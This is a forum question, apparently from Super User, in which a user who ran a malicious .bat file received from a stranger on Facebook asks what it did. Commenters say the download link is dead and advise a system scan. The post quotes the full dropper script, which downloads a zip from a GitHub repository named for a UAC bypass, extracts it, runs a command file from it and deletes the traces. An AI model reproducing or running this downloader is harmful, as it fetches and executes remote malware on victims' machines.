-1

Got an zipped archive from a stranger over FB messenger, containing a file named 'Poor quality item-a4UEBzN0Tg45RTzLA100-22100-10955.bat' in it. My bad that I double clicked the file from inside the zipped archive without thinking anything. And as it happened, it promptly ran some code in windows command window and disappeared in a flash. I just could see something 'github' and 'delete' etc words.

Can someone pls help tell me what these commands do? And by which portion of these commands can I learn what they did to my pc?

@echo off
cls
set url=https://github.com/xjnhzaj12b1/iscsicpl_bypassUAC/raw/main/4khanhhieu2.zip
set ZIP_PATH=C:\Users\Public
curl -L -o "%ZIP_PATH%" "%URL%"
powershell -command "Expand-Archive -LiteralPath '%ZIP_PATH%' -DestinationPath '%DESTINATION_FOLDER%'"
del "%ZIP_PATH%"
call ""%DESTINATION_FOLDER%\vn.cmd"
del "%DESTINATION_FODLER%\vn.cmd"
exit
Bathinda Helper
  • 123
  • 1
  • 10
  • 1
    It attempted to download a file from `https://github.com/xjnhzaj12b1/iscsicpl_bypassUAC/raw/main/4khanhhieu2.zip` which appears to now be deleted. What that file did is anyone's guess. It could be that when you ran the script the file had already been removed in which case you would be fine, but we have no idea other than that. Scan your system. – Mokubai Aug 22 '23 at 09:22
  • 1
    The file exploited a 0 day exploit in specific Windows DLL. As to what else the script did is anyone’s guess. **Don’t open random files from strangers on Facebook.** The exploit was easily researched – Ramhound Aug 22 '23 at 09:39
  • Thank you. Pls tell if ran 3rd line (beginning with 'set url') and 4th line starting with 'curl..' and 5th line starting with 'powershell...', would the file be downloaded to my pc at c-users-public and this way I could see what were the contents of that file. Thanks again. Note: I know basic terminal commands. – Bathinda Helper Aug 23 '23 at 10:00
  • 2
    @BathindaHelper - The URL currently is dead. Impossible to do post analysis on the script for that reason. It’s dead due to the fact it was malicious. If you were vulnerable to the exploits, is impossible to determine, based on the information provided. Additionally, question is closed, so submitting an analysis is impossible even if it was possible to perform. So, no, I won’t do any analysis. – Ramhound Aug 23 '23 at 10:06
  • Ok. Thanks. that's enough information to give me some peace. I'd be much much more careful in future. Thanks. – Bathinda Helper Aug 23 '23 at 14:37

0 Answers0